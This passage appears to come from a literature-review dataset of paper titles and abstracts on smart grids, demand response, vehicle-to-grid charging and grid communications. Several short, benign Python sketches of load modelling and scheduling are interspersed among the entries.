and implementation impact of V2G/grid-to-vehicle (G2V) technologies on distribution systems, requirements, benefits, challenges, and strategies for V2G interfaces of both individual vehicles and fleets. The V2G concept can improve the performance of the electricity grid in areas such as efficiency, stability, and reliability.
A V2G-capable vehicle offers reactive power support, active power regulation, tracking of variable renewable energy sources, load balancing, and current harmonic filtering. These technologies can enable ancillary services, such as voltage and frequency control and spinning reserve. Costs of V2G include battery degradation, the need for intensive communication between the vehicles and the grid, effects on grid distribution equipment, infrastructure changes, and social, political, cultural, and technical obstacles. Although V2G operation can reduce the lifetime of vehicle batteries, it is projected to become economical for vehicle owners and grid operators. Components and unidirectional/bidirectional power flow technologies of V2G systems, individual and aggregated structures, and charging/recharging frequency and strategies (uncoordinated/coordinated smart) are addressed. Three elements are required for successful V2G operation: power connection to the grid, control and communication between vehicles and the grid operator, and on-board/off-board intelligent metering. Success of the V2G concept depends on standardization of requirements and infrastructure decisions, battery technology, and efficient and smart scheduling of limited fast-charge infrastructure. A charging/discharging infrastructure must be deployed. Economic benefits of V2G technologies depend on vehicle aggregation and charging/recharging frequency and strategies. The benefits will receive increased attention from grid operators and vehicle owners in the future. --- paper_title: Smart grid technologies and applications for the industrial sector paper_content: Abstract Smart grids have become a topic of intensive research, development, and deployment across the world over the last few years. The engagement of consumer sectors—residential, commercial, and industrial—is widely acknowledged as crucial for the projected benefits of smart grids to be realized. Although the industrial sector has traditionally been involved in managing power use with what today would be considered smart grid technologies, these applications have mostly been one-of-a-kind, requiring substantial customization. Our objective in this article is to motivate greater interest in smart grid applications in industry. We provide an overview of smart grids and of electricity use in the industrial sector. Several smart grid technologies are outlined, and automated demand response is discussed in some detail. Case studies from aluminum processing, cement manufacturing, food processing, industrial cooling, and utility plants are reviewed. Future directions in interoperable standards, advances in automated demand response, energy use optimization, and more dynamic markets are discussed. --- paper_title: Autonomous Demand-Side Management Based on Game-Theoretic Energy Consumption Scheduling for the Future Smart Grid paper_content: Most of the existing demand-side management programs focus primarily on the interactions between a utility company and its customers/users. In this paper, we present an autonomous and distributed demand-side energy management system among users that takes advantage of a two-way digital communication infrastructure which is envisioned in the future smart grid. We use game theory and formulate an energy consumption scheduling game, where the players are the users and their strategies are the daily schedules of their household appliances and loads. 
It is assumed that the utility company can adopt adequate pricing tariffs that differentiate the energy usage in time and level. We show that for a common scenario, with a single utility company serving multiple customers, the global optimal performance in terms of minimizing the energy costs is achieved at the Nash equilibrium of the formulated energy consumption scheduling game. The proposed distributed demand-side energy management strategy requires each user to simply apply its best response strategy to the current total load and tariffs in the power distribution system. The users can maintain privacy and do not need to reveal the details on their energy consumption schedules to other users. We also show that users will have the incentives to participate in the energy consumption scheduling game and subscribing to such services. Simulation results confirm that the proposed approach can reduce the peak-to-average ratio of the total energy demand, the total energy costs, as well as each user's individual daily electricity charges. --- paper_title: Intelligent demand response scheme for energy management of industrial systems paper_content: Electric demand side management (DSM) focuses on changing the electricity consumption patterns of end-use customers through improving energy efficiency and optimizing allocation of power. Demand response (DR) is a DSM solution that targets residential, commercial and industrial customers, and is developed for demand reduction or demand shifting at a specific time for a specific duration. In the absence of on-site generation or possibility of demand shifting, consumption level needs to be lowered. While non-criticality of loads at the residential and commercial levels allows for demand reduction with relative ease, demand reduction of industrial processes requires a more sophisticated solution. Production constraints, inventory constraints, maintenance schedules and crew management are some of the many factors that have to be taken into account before one or more processes can be temporarily shut down. An intelligent system is designed in this paper for implementation of DR at an industrial site. Based on the various operational constraints of the industrial process, it determines the loads that could be potentially curtailed. Fuzzy/expert systems are used to derive a priority factor for different candidate loads. This information can then be used by the plant operator/DR client to make a comply/opt-out decision during a utility-initiated DR event. --- paper_title: Utilizing Automated Demand Response in commercial buildings as non-spinning reserve product for ancillary services markets paper_content: In 2009, a pilot program was conducted to investigate the technical feasibility of bidding non-residential demand response (DR) resources into the California Independent System Operator's (CAISO) day-ahead ancillary services market as non-spinning reserves product. Three facilities, a retail store, a local government office building, and a bakery, were recruited into the pilot program and moved from automated price responsive programs to CAISO's participating load program. For each facility, hourly demand, and load curtailment potential were forecasted two days ahead and submitted to the CAISO the day before the trading day as an available resource. These DR resources were optimized against all other generation resources in the CAISO ancillary services market. 
Each facility was equipped with four-second real-time telemetry equipment to ensure resource accountability and visibility to CAISO operators. When CAISO requested DR resources, the OpenADR (Open Automated DR) communications infrastructure was utilized to deliver DR signals to the facilities' energy management and control systems. The pre-programmed DR strategies were triggered without a human in the loop. This paper describes the automated system architecture with a detailed description of meter feedback in the DR signaling to maintain demand reduction at the government office building. The results showed that the OpenADR infrastructure could be used for some products in the ancillary services market, and that DR strategies for heating, ventilation and air conditioning and lighting provide a fast enough response to participate in the non-spinning reserve product in the ancillary services market. --- paper_title: Quantifying Changes in Building Electricity Use, With Application to Demand Response paper_content: We present methods for analyzing commercial and industrial facility 15-min-interval electric load data. These methods allow building managers to better understand their facility's electricity consumption over time and to compare it to other buildings, helping them to “ask the right questions” to discover opportunities for demand response, energy efficiency, electricity waste elimination, and peak load management. We primarily focus on demand response. Methods discussed include graphical representations of electric load data, a regression-based electricity load model that uses a time-of-week indicator variable and a piecewise linear and continuous outdoor air temperature dependence, and the definition of various parameters that characterize facility electricity loads and demand response behavior. In the future, these methods could be translated into easy-to-use tools for building managers. --- paper_title: Findings from Seven Years of Field Performance Data for Automated Demand Response in Commercial Buildings paper_content: California is a leader in automating demand response (DR) to promote low-cost, consistent, and predictable electric grid management tools. Over 250 commercial and industrial facilities in California participate in fully-automated programs providing over 60 MW of peak DR savings. This paper presents a summary of Open Automated DR (OpenADR) implementation by each of the investor-owned utilities in California. It provides a summary of participation, DR strategies and incentives. Commercial buildings can reduce peak demand by 5 to 15 percent, with an average of 13 percent. Industrial facilities shed much higher loads. For buildings with multi-year savings we evaluate their load variability and shed variability. We provide a summary of control strategies deployed, along with costs to install automation. We report on how the electric DR control strategies perform over many years of events. We benchmark the peak demand of this sample of buildings against their past baselines to understand the differences in building performance over the years. This is done with peak demand intensities and load factors. The paper also describes the importance of these data in helping to understand possible techniques to reach net zero energy using peak day dynamic control capabilities in commercial buildings. We present an example in which the electric load shape changed as a result of a lighting retrofit.
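The "Quantifying Changes in Building Electricity Use" entry above describes a baseline model built from a time-of-week indicator plus a piecewise linear, continuous outdoor-air-temperature term. A minimal sketch of that kind of regression is given below, assuming 15-minute intervals and a handful of temperature knots; the knot locations, units, and the shed calculation are illustrative assumptions, not the exact specification used in the cited work.

```python
# Sketch of a baseline load regression with a time-of-week indicator and a
# piecewise linear, continuous outdoor-air-temperature dependence. Knot
# placement and the shed definition are illustrative assumptions.
import numpy as np

BINS_PER_WEEK = 7 * 24 * 4                       # 15-minute time-of-week bins
KNOTS = [10.0, 15.0, 20.0, 25.0, 30.0]           # assumed temperature knots (deg C)

def design_matrix(time_of_week_bin, temp_c):
    temp_c = np.asarray(temp_c, dtype=float)
    n = len(temp_c)
    X = np.zeros((n, BINS_PER_WEEK + 1 + len(KNOTS)))
    X[np.arange(n), time_of_week_bin] = 1.0       # one indicator per 15-minute bin
    X[:, BINS_PER_WEEK] = temp_c                  # base temperature slope
    for j, k in enumerate(KNOTS):                 # hinge terms: the slope changes at
        X[:, BINS_PER_WEEK + 1 + j] = np.maximum(temp_c - k, 0.0)   # each knot, fit stays continuous
    return X

def fit_baseline(time_of_week_bin, temp_c, load_kw):
    X = design_matrix(time_of_week_bin, temp_c)
    beta, *_ = np.linalg.lstsq(X, np.asarray(load_kw, dtype=float), rcond=None)
    return beta

def estimated_shed(beta, time_of_week_bin, temp_c, observed_kw):
    baseline = design_matrix(time_of_week_bin, temp_c) @ beta
    return baseline - np.asarray(observed_kw, dtype=float)   # positive values = load shed
```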
--- paper_title: Methodology for validating technical tools to assess customer Demand Response: Application to a commercial customer paper_content: The authors present a methodology, which is demonstrated with some applications to the commercial sector, in order to validate a Demand Response (DR) evaluation method previously developed and applied to a wide range of industrial and commercial segments, whose flexibility was evaluated by modeling. DR is playing a more and more important role in the framework of electricity systems management for the effective integration of other distributed energy resources. Consequently, customers must identify what they are using the energy for in order to use their flexible loads for management purposes. Modeling tools are used to predict the impact of flexibility on the behavior of customers, but this result needs to be validated since both customers and grid operators have to be confident in these flexibility predictions. An easy-to-use two-step method to achieve this goal is presented in this paper. --- paper_title: Opportunities, Barriers and Actions for Industrial Demand Response in California paper_content: Report by Aimee T. McKane, Mary Ann Piette, David Faulkner, Girish Ghatikar, Anthony Radspieler Jr., Bunmi Adesola, Scott Murtishaw and Sila Kiliccote, Lawrence Berkeley National Laboratory, January 2008. The work described in this report was coordinated by the Demand Response Research Center and funded by the California Energy Commission Public Interest Energy Research Program and by the U.S. Department of Energy. --- paper_title: Load management for refrigeration systems: Potentials and barriers paper_content: As a strategy to deal with the increasing intermittent input of renewable energy sources in Germany, the adaptation of power consumption is complementary to power-plant regulation, grid expansion and physical energy storage. One demand sector that promises strong returns for load management efforts is cooling and refrigeration. In these processes, thermal inertia provides a temporal buffer for shifting and adjusting the power consumption of cooling systems. We have conducted an empirical investigation to obtain a detailed and time-resolved bottom-up analysis of load management for refrigeration systems in the city of Mannheim, Germany. We have extrapolated our results to general conditions in Germany. Several barriers inhibit the rapid adoption of load management strategies for cooling systems, including informational barriers, strict compliance with legal cooling requirements, liability issues, lack of technical experience, an inadequate rate of return and organizational barriers. Small commercial applications of refrigeration in food retailing and cold storage in hotels and restaurants are particularly promising starting points for intelligent load management. When our results are applied to Germany, suitable sectors for load management have theoretical and achievable potential values of 4.2 and 2.8 GW, respectively, amounting to about 4-6% of the maximum power demand in Germany.
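The refrigeration study above exploits thermal inertia: a cold store can ride through a demand-response event on its stored cooling as long as product temperatures stay within legal limits. The sketch below shows that idea with a first-order room model and a compressor lock-out during the event window; every parameter (time constant, pull-down rate, temperature band, event timing) is an assumed illustrative value, not data from the Mannheim study.

```python
# Sketch of thermal-inertia-based load shifting for a cold room: the compressor
# is held off during a demand-response window for as long as the air temperature
# stays within its legal band. All parameters are illustrative assumptions.

AMBIENT_C = 22.0          # ambient temperature (assumed)
TAU_H = 8.0               # assumed thermal time constant of the cold room (hours)
COOL_RATE_C_PER_H = 3.0   # assumed pull-down rate with the compressor running
T_MAX_C = 7.0             # assumed legal upper limit for stored food
T_SET_C = 4.0             # normal set point

def step(temp_c, compressor_on, dt_h=0.25):
    """Advance the room temperature by one 15-minute step."""
    drift = (AMBIENT_C - temp_c) / TAU_H          # warming toward ambient
    cooling = COOL_RATE_C_PER_H if compressor_on else 0.0
    return temp_c + dt_h * (drift - cooling)

def simulate(dr_window, horizon_steps=96, dt_h=0.25):
    """Thermostat control, except the compressor is locked out during dr_window."""
    temp, schedule = T_SET_C, []
    for k in range(horizon_steps):
        in_event = k in dr_window
        # Lock out the compressor during the DR event unless the legal limit
        # would otherwise be breached on the next step.
        on = (temp > T_SET_C) and (not in_event or step(temp, False, dt_h) > T_MAX_C)
        temp = step(temp, on, dt_h)
        schedule.append(on)
    return schedule

# e.g. a two-hour event starting at 17:00 (steps 68..75 of a day starting at 00:00)
compressor_schedule = simulate(dr_window=set(range(68, 76)))
```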
--- paper_title: Opportunities for Energy Efficiency and Demand Response in the California Cement Industry paper_content: This study examines the characteristics of cement plants and their ability to shed or shift load to participate in demand response (DR). Relevant factors investigated include the various equipment and processes used to make cement, the operational limitations cement plants are subject to, and the quantities and sources of energy used in the cement-making process. Opportunities for energy efficiency improvements are also reviewed. The results suggest that cement plants are good candidates for DR participation. The cement industry consumes over 400 trillion Btu of energy annually in the United States, and consumes over 150 MW of electricity in California alone. The chemical reactions required to make cement occur only in the cement kiln, and intermediate products are routinely stored between processing stages without negative effects. Cement plants also operate continuously for months at a time between shutdowns, allowing flexibility in operational scheduling. In addition, several examples of cement plants altering their electricity consumption based on utility incentives are discussed. Further study is needed to determine the practical potential for automated demand response (Auto-DR) and to investigate the magnitude and shape of achievable sheds and shifts. --- paper_title: The industry demands better demand response paper_content: The promise and hype surrounding the Smart Grid far exceeds its current capabilities. In no area is this truer than with Demand Response (DR) programs for the commercial building sector, which is responsible for 20 percent of energy demand and emissions in the United States. These concentrated pools of demand are a nightmare for ever-more strained utility grids, especially in major cities. As a result, utilities have created DR programs to provide financial incentives for building owners to reduce energy consumption during peak periods. This paper explores what these programs currently entail and why they are not working. It then presents and discusses an alternative that can break the major barriers to adoption of the Smart Grid - moving from a manual to the Optimized Demand Response system. --- paper_title: Agent-based electricity market simulation with demand response from commercial buildings paper_content: With the development of power system deregulation and smart metering technologies, price-based demand response (DR) becomes an alternative solution to improving power system reliability and efficiency by adjusting the load profile. In this paper, we simulate an electricity market with DR from different types of commercial buildings by using agent-based modeling and simulation (ABMS) techniques. We focus on the consumption behavior of commercial buildings with different levels of DR penetration in different market structures. The results indicate that there is a noticeable impact from commercial buildings with price-responsive demand on the electricity market, and this impact differs with different scales of DR participation under different levels of market competitions. --- paper_title: A System Architecture for Autonomous Demand Side Load Management in Smart Buildings paper_content: This paper presents a system architecture for load management in smart buildings which enables autonomous demand side load management in the smart grid. 
Being of a layered structure composed of three main modules for admission control, load balancing, and demand response management, this architecture can encapsulate the system functionality, assure the interoperability between various components, allow the integration of different energy sources, and ease maintenance and upgrading. Hence it is capable of handling autonomous energy consumption management for systems with heterogeneous dynamics in multiple time-scales and allows seamless integration of diverse techniques for online operation control, optimal scheduling, and dynamic pricing. The design of a home energy manager based on this architecture is illustrated and the simulation results with Matlab/Simulink confirm the viability and efficiency of the proposed framework. --- paper_title: A Survey on Cyber Security for Smart Grid Communications paper_content: A smart grid is a new form of electricity network with high fidelity power-flow control, self-healing, and energy reliability and energy security using digital communications and control technology. Upgrading an existing power grid into a smart grid requires significant dependence on intelligent and secure communication infrastructures. It requires security frameworks for distributed communications, pervasive computing and sensing technologies in smart grid. However, since many of the communication technologies currently recommended for use in a smart grid are vulnerable in terms of cyber security, their adoption could lead to unreliable system operations, causing unnecessary expenditure, even consequential disaster to both utilities and consumers. In this paper, we summarize the cyber security requirements and the possible vulnerabilities in smart grid communications and survey the current solutions on cyber security for smart grid communications. --- paper_title: Cyber Security and Privacy Issues in Smart Grids paper_content: Smart grid is a promising power delivery infrastructure integrated with communication and information technologies. Its bi-directional communication and electricity flow enable both utilities and customers to monitor, predict, and manage energy usage. It also advances energy and environmental sustainability through the integration of vast distributed energy resources. Deploying such a green electric system has enormous and far-reaching economic and social benefits. Nevertheless, increased interconnection and integration also introduce cyber-vulnerabilities into the grid. Failure to address these problems will hinder the modernization of the existing power system. In order to build a reliable smart grid, an overview of relevant cyber security and privacy issues is presented. Based on the current literature, several potential research fields are discussed at the end of this paper. --- paper_title: A Survey on Smart Grid Communication Infrastructures: Motivations, Requirements and Challenges paper_content: A communication infrastructure is an essential part of the success of the emerging smart grid. A scalable and pervasive communication infrastructure is crucial in both construction and operation of a smart grid. In this paper, we present the background and motivation of communication infrastructures in smart grid systems. We also summarize major requirements that smart grid communications must meet.
From the experience of several industrial trials on smart grid with communication infrastructures, we expect that the traditional carbon fuel based power plants can cooperate with emerging distributed renewable energy such as wind, solar, etc., to reduce the carbon fuel consumption and consequent greenhouse gas such as carbon dioxide emission. The consumers can minimize their expense on energy by adjusting their intelligent home appliance operations to avoid the peak hours and utilize the renewable energy instead. We further explore the challenges for a communication infrastructure as part of a complex smart grid system. Since a smart grid system might have millions of consumers and devices, the demands on its reliability and security are extremely critical. Through a communication infrastructure, a smart grid can improve power reliability and quality to eliminate electricity blackout. Security is a challenging issue since the on-going smart grid systems face increasing vulnerabilities as more and more automation, remote monitoring/controlling and supervision entities are interconnected. --- paper_title: Scalable and Robust Demand Response With Mixed-Integer Constraints paper_content: A demand response (DR) problem is considered entailing a set of devices/subscribers, whose operating conditions are modeled using mixed-integer constraints. Device operational periods and power consumption levels are optimized in response to dynamic pricing information to balance user satisfaction and energy cost. Renewable energy resources and energy storage systems are also incorporated. Since DR becomes more effective as the number of participants grows, scalability is ensured through a parallel distributed algorithm, in which a DR coordinator and DR subscribers solve individual subproblems, guided by certain coordination signals. As the problem scales, the recovered solution becomes near-optimal. Robustness to random variations in electricity price and renewable generation is effected through robust optimization techniques. Real-time extension is also discussed. Numerical tests validate the proposed approach. --- paper_title: Smart Grid — The New and Improved Power Grid: A Survey paper_content: The Smart Grid, regarded as the next generation power grid, uses two-way flows of electricity and information to create a widely distributed automated energy delivery network. In this article, we survey the literature till 2011 on the enabling technologies for the Smart Grid. We explore three major systems, namely the smart infrastructure system, the smart management system, and the smart protection system. We also propose possible future directions in each system. Specifically, for the smart infrastructure system, we explore the smart energy subsystem, the smart information subsystem, and the smart communication subsystem. For the smart management system, we explore various management objectives, such as improving energy efficiency, profiling demand, maximizing utility, reducing cost, and controlling emission. We also explore various management methods to achieve these objectives. For the smart protection system, we explore various failure protection mechanisms which improve the reliability of the Smart Grid, and explore the security and privacy issues in the Smart Grid.
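The mixed-integer demand response entry above optimizes device operating periods and power levels against dynamic prices. As a hedged illustration of the kind of per-subscriber subproblem such a formulation contains (not the paper's coordination algorithm), the sketch below picks the cheapest start hour for a single uninterruptible appliance by enumerating the binary start-time choices; the price vector, power rating, runtime and time window are assumed for the example.

```python
def best_start(prices, runtime, power_kw, earliest, latest):
    """Pick the cheapest feasible start hour for an uninterruptible load.

    The binary 'start at hour h' choice is the integer part of a
    mixed-integer DR model; with a single device it can be solved by
    enumerating every start that finishes within the user's window.
    """
    candidates = range(earliest, latest - runtime + 1)
    def window_cost(h):
        return power_kw * sum(prices[h:h + runtime])
    start = min(candidates, key=window_cost)
    return start, window_cost(start)

# Assumed day-ahead prices ($/kWh) for 24 hours and a 2 kW load that must
# run 3 consecutive hours, starting no earlier than 08:00 and done by 22:00.
prices = [0.05] * 7 + [0.12, 0.18, 0.22, 0.25, 0.24, 0.20, 0.15, 0.14,
                       0.16, 0.21, 0.28, 0.30, 0.26, 0.18, 0.10, 0.07, 0.05]
start, cost = best_start(prices, runtime=3, power_kw=2.0, earliest=8, latest=22)
print(f"cheapest start hour: {start}, energy cost: ${cost:.2f}")
```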
--- paper_title: A Reliability Perspective of the Smart Grid paper_content: Increasing complexity of power grids, growing demand, and requirement for greater reliability, security and efficiency as well as environmental and energy sustainability concerns continue to highlight the need for a quantum leap in harnessing communication and information technologies. This leap toward a "smarter" grid is widely referred to as "smart grid." A framework for cohesive integration of these technologies facilitates convergence of acutely needed standards, and implementation of necessary analytical capabilities. This paper critically reviews the reliability impacts of major smart grid resources such as renewables, demand response, and storage. We observe that an ideal mix of these resources leads to a flatter net demand that eventually accentuates reliability challenges further. A gridwide IT architectural framework is presented to meet these challenges while facilitating modern cybersecurity measures. This architecture supports a multitude of geographically and temporally coordinated hierarchical monitoring and control actions over time scales from milliseconds and up. --- paper_title: The Progressive Smart Grid System from Both Power and Communications Aspects paper_content: The present electric power system structure has lasted for decades; it is still partially proprietary, energy-inefficient, physically and virtually (or cyber) insecure, as well as prone to power transmission congestion and consequent failures. Recent efforts in building a smart grid system have focused on addressing the problems of global warming effects, rising energy-hungry demands, and risks of peak loads. One of the major goals of the new system is to effectively regulate energy usage by utilizing the backbone of the prospectively deployed Automatic Meter Reading (AMR), Advanced Meter Infrastructure (AMI), and Demand Response (DR) programs via the advanced distribution automation and dynamic pricing models. The power grid is no longer a system that only supplies energy to end users, but one that also allows consumers to contribute their clean energy back to the grid in the future. In the meantime, communications networks in the electric power infrastructure enact critical roles. Intelligent automation proposed in smart grid projects includes the Supervisory Control And Data Acquisition/Energy Management Systems (SCADA/EMS) and Phasor Measurement Units (PMU) in transmission networks, as well as the AMR/AMI associated with field/neighborhood area networks (FAN/NAN) and home area networks (HAN) at the distribution and end-use levels. This article provides an overview of the essentials of the progressive smart grid paradigm and integration of different communications technologies for the legacy power system. Additionally, foreseeable issues and challenges in designing communications networks for the smart grid system are also rigorously deliberated in this paper.
In this article, we explore how cloud computing (CC), a next-generation computing paradigm, can be used for information management of the SG and present a novel SG information management paradigm, called Cloud Service-Based SG Information Management (CSSGIM). We analyze the benefits and opportunities from the perspectives of both the SG and CC domains. We further propose a model for CSSGIM and present four motivating applications. --- paper_title: A Survey of Communication Protocols for Automatic Meter Reading Applications paper_content: Utility companies (electricity, gas, and water suppliers), governments, and researchers have been urging to deploy communication-based systems to read meters, known as automatic meter reading (AMR). An AMR system is envisaged to bring on benefits to customers, utilities, and governments. The advantages include reducing peak demand for energy, supporting the time-of-use concept for billing, enabling customers to make informed decisions, and reducing the cost of meter reading, to name a few. A key element in an AMR system is communications between meters and utility servers. Though several communication technologies have been proposed and implemented at a small scale, with the wide proliferation of wireless communication, it is the right time to critique the old proposals and explore new possibilities for the next generation AMR. We provide a comprehensive review of the AMR technologies proposed so far. Next, we present how future AMRs will benefit from third generation (3G) communication systems, the DLMS/COSEM (Data Language Messaging Specification/Companion Specification for Energy Metering) standard and Internet Protocol-based SIP (Session Initiation Protocol) signaling at the application level. The DLMS/COSEM standard provides a framework for meters to report application data (i.e. meter readings) to a utility server in a reliable manner. The SIP protocol is envisaged to be used as the signaling protocol between application entities running on meters and servers. The DLMS/COSEM standard and the SIP protocol are expected to provide an application level communication abstraction to achieve reliability and scalability. Finally, we identify the challenges at the application level that need to be tackled. The challenges include handling failure, gathering meter data under different time constraints (ranging from real-time to delay-tolerance), disseminating (i.e., unicasting, multicasting, broadcasting, and geocasting) control data to the meters, and achieving secure communication. --- paper_title: Communication services and data model for demand response paper_content: Demand response (DR) is becoming an integral part of the modern power distribution systems. By partially reducing the consumption level or shifting it from peak hours to off-peak hours, DR can function as a tool for the utility to respond to shortage of supply for a short duration of time. It helps stabilize the electricity market, postpone capacity expansion projects for building new power generation units, and can potentially lead to mutual financial benefits for the utility as well as the customers. DR is one of the enablers of the Smart Grid paradigm as it promotes the interaction and responsiveness of the customers and changes the grid from a vertically integrated structure to one that is also affected by the behavior of the demand side. 
Essential to successful implementation of demand response is an efficient communication infrastructure capable of providing a secure two-way data exchange means between the utility and the customers. The focus of this paper is on the communication services and data models that are needed for realization of DR at the residential and commercial levels. The proposed model is platform independent, promoting interoperability as one of the key operational requirements of demand response implementation. --- paper_title: Smart Grid Communications: Overview of Research Challenges, Solutions, and Standardization Activities paper_content: Optimization of energy consumption in future intelligent energy networks (or Smart Grids) will be based on grid-integrated near-real-time communications between various grid elements in generation, transmission, distribution and loads. This paper discusses some of the challenges and opportunities of communications research in the areas of smart grid and smart metering. In particular, we focus on some of the key communications challenges for realizing interoperable and future-proof smart grid/metering networks, smart grid security and privacy, and how some of the existing networking technologies can be applied to energy management. Finally, we also discuss the coordinated standardization efforts in Europe to harmonize communications standards and protocols. --- paper_title: Integrated Voltage, Var Control and demand response in distribution systems paper_content: This paper addresses the requirements for utilizing Voltage and Var Control for demand response, in an operating environment which includes Smart-Grid, Distribution Management Systems, Advanced Metering Infrastructure, Demand Response, and Distributed Energy Resources. --- paper_title: Dynamic Pricing? Not So Fast! A Residential Consumer Perspective paper_content: With the installation of smart metering, will residential customers be moved to "dynamic" pricing? Some supporters of changing residential rate design from a fixed and stable rate structure believe customers should be required to take electric service with time-variant price signals. Not so fast, though! There are real implications associated with this strategy. --- paper_title: Demand Response and Distribution Grid Operations: Opportunities and Challenges paper_content: Demand response (DR) is becoming an integral part of power system and market operations. Smart grid technologies will further increase the use of DR in everyday operations. Once the volume of the DR reaches a certain threshold, the effect of the DR events on the distribution and transmission system operations will be hard to ignore. This paper proposes changing the business process of DR scheduling and implementation by integrating DR with distribution grid topology. Study cases using OATI webDistribute show the potential DR effect on distribution grid operations and the distribution grid changing the effectiveness of the DR. These examples illustrate the need of integrating demand response with the distribution grid. --- paper_title: A Framework for Evaluation of Advanced Direct Load Control With Minimum Disruption paper_content: The advent of advanced sensor technology and the breakthroughs in telecommunication open up several new possibilities for demand-side management. More recently, there has been greater interest from utilities as well as system operators in utilizing load as a system resource through the application of new technologies. 
With the wider application of demand-side management, there is an increasing emphasis on control of loads with minimum disruption. This paper develops a new framework for designing as well as assessing such an advanced direct load control program with the objective of minimizing end-user discomfort and is formulated as an optimization problem. With a fairly general setup for demand-side management, a simulation-based framework is developed for the stochastic optimization problem. Next, using this framework, insights into the effect of different parameters and constraints in the model on load control are developed. --- paper_title: QoE-driven power scheduling in smart grid: architecture, strategy, and methodology paper_content: Smart grid is a new emerging technology which is able to intelligently control the power consumption via network. Therefore, the efficiency of the information exchange between the power suppliers (or control centers) and power customers is an important issue for smart grid. Moreover, the performance of the smart grid usually depends on the customer's satisfaction degree which belongs to the field of quality of experience. In this article, we propose a QoE-driven power scheduling in the context of smart grid from the perspectives of architecture, strategy, and methodology. Specifically, it takes into account the QoE requirement when designing the power allocation scheme. For obtaining the QoE requirement, we analyze the fluctuation of the power load and the impact of the transmission delay. In particular, the power allocation is formulated as an optimization problem that maximizes the social welfare of the system. Based on the given QoE model, an efficient power scheduling scheme is proposed by jointly considering the admission control and QoE expectation. Extensive simulation results indicate that the proposed scheme can efficiently allocate the power according to the dynamic QoE requirements in a practical smart grid system. --- paper_title: From Packet to Power Switching: Digital Direct Load Scheduling paper_content: At present, the power grid has tight control over its dispatchable generation capacity but a very coarse control on the demand. Energy consumers are shielded from making price-aware decisions, which degrades the efficiency of the market. This state of affairs tends to favor fossil fuel generation over renewable sources. Because of the technological difficulties of storing electric energy, the quest for mechanisms that would make the demand for electricity controllable on a day-to-day basis is gaining prominence. The goal of this paper is to provide one such mechanisms, which we call Digital Direct Load Scheduling (DDLS). DDLS is a direct load control mechanism in which we unbundle individual requests for energy and digitize them so that they can be automatically scheduled in a cellular architecture. Specifically, rather than storing energy or interrupting the job of appliances, we choose to hold requests for energy in queues and optimize the service time of individual appliances belonging to a broad class which we refer to as "deferrable loads". The function of each neighborhood scheduler is to optimize the time at which these appliances start to function. This process is intended to shape the aggregate load profile of the neighborhood so as to optimize an objective function which incorporates the spot price of energy, and also allows distributed energy resources to supply part of the generation dynamically. 
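The Digital Direct Load Scheduling entry above holds requests from deferrable appliances in queues and chooses their start times to shape the neighborhood load against the spot price. The snippet below is a deliberately simplified, hedged sketch of that idea rather than the authors' scheduler: queued fixed-length requests are greedily placed on the cheapest feasible hours subject to an assumed feeder capacity cap, and every name and number in it is illustrative.

```python
from collections import deque

def schedule_requests(requests, prices, feeder_cap_kw):
    """Assign each queued (name, kW, duration_h) request a start hour.

    Greedy sketch of direct load scheduling: requests are served in
    queue order, and each one is placed on the cheapest block of
    consecutive hours that still has spare feeder capacity.
    """
    horizon = len(prices)
    headroom = [feeder_cap_kw] * horizon          # spare capacity per hour
    plan = {}
    queue = deque(requests)
    while queue:
        name, kw, dur = queue.popleft()
        feasible = [h for h in range(horizon - dur + 1)
                    if all(headroom[h + k] >= kw for k in range(dur))]
        if not feasible:
            plan[name] = None                      # deferred past the horizon
            continue
        start = min(feasible, key=lambda h: sum(prices[h:h + dur]))
        for k in range(dur):
            headroom[start + k] -= kw
        plan[name] = start
    return plan

# Assumed overnight price profile and three queued appliance requests.
prices = [0.30, 0.22, 0.12, 0.08, 0.07, 0.07, 0.09, 0.15]
requests = [("dishwasher", 1.5, 2), ("ev_charger", 7.0, 3), ("dryer", 3.0, 1)]
print(schedule_requests(requests, prices, feeder_cap_kw=8.0))
```

A real scheduler would also handle deadlines, interruption, fairness across households and feedback from distributed generation, all of which are omitted here for brevity.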
--- paper_title: Load recognition for automated demand response in microgrids paper_content: Microgrids are well-suited for electrification of remote off-grid areas. This paper sketches the concept of a plug-and-play microgrid with a minimum of configuration effort needed for setup. When the load of such an off-grid microgrid grows over the generation capacity and energy storage is not sufficient, demand has to be reduced to prevent a blackout. In order to decide which loads are inessential and can be shedded, automated load recognition on the basis of measured power consumption profiles is needed. Two promising approaches from the area of speech recognition, Dynamic Time Warping and Hidden Markov Models, are compared for this application. It is found that a key feature to achieve good recognition efficiency is a careful selection of the features extracted from the measured power data. --- paper_title: Distributed demand response and user adaptation in smart grids paper_content: This paper proposes a distributed framework for demand response and user adaptation in smart grid networks. In particular, we borrow the concept of congestion pricing in Internet traffic control and show that pricing information is very useful to regulate user demand and hence balance network load. User preference is modeled as a willingness to pay parameter which can be seen as an indicator of differential quality of service. Both analysis and simulation results are presented to demonstrate the dynamics and convergence behavior of the algorithm. --- paper_title: An Optimal and Distributed Demand Response Strategy With Electric Vehicles in the Smart Grid paper_content: In this paper, we propose a new model of demand response management for the future smart grid that integrates plug-in electric vehicles and renewable distributed generators. A price scheme considering fluctuation cost is developed.
We consider a market where users have the flexibility to sell back the energy generated from their distributed generators or the energy stored in their plug-in electric vehicles. A distributed optimization algorithm based on the alternating direction method of multipliers is developed to solve the optimization problem, in which consumers need to report their aggregated loads only to the utility company, thus ensuring their privacy. Consumers can update their loads scheduling simultaneously and locally to speed up the optimization computing. Using numerical examples, we show that the demand curve is flattened after the optimization, even though there are uncertainties in the model, thus reducing the cost paid by the utility company. The distributed algorithms are also shown to reduce the users' daily bills. --- paper_title: A novel charging-time control method for numerous EVs based on a period weighted prescheduling for power supply and demand balancing paper_content: To establish a sustainable energy supply system, renewable energy sources and low-carbon vehicles will have to become more widespread. However, it is often pointed out that the dissemination of these technologies will cause difficulties in balancing supply and demand in a power system, due to the fluctuation in the amounts of renewable energy generated and the fluctuation in the power demanded for numerous electric vehicles (EVs). The numerous EVs charging control seems to be difficult due to the difficulties in predicting EV trip behaviors, which vary depending on individual EV users. However, if we can control the total demand of numerous EVs, we can not only level their total load shape but also improve the supply-demand balancing capability of a power system to create new ancillary service businesses in the power market. This paper proposes a novel centralized EV-charging-control method to modify the total demand of EV charging by scheduling EV charging times. The proposed method is expected to be a powerful tool for a power aggregator (PAG), which will supply EV charging services to EV users and load leveling services to transmission system operators (TSOs) without inconveniencing EV users. The simulation showed that under the assumed EV trip patterns, the total charging demand of numerous EVs was successfully shaped so that the differences between watt-hours of the requirement and those of the controlled results were less than 4%. --- 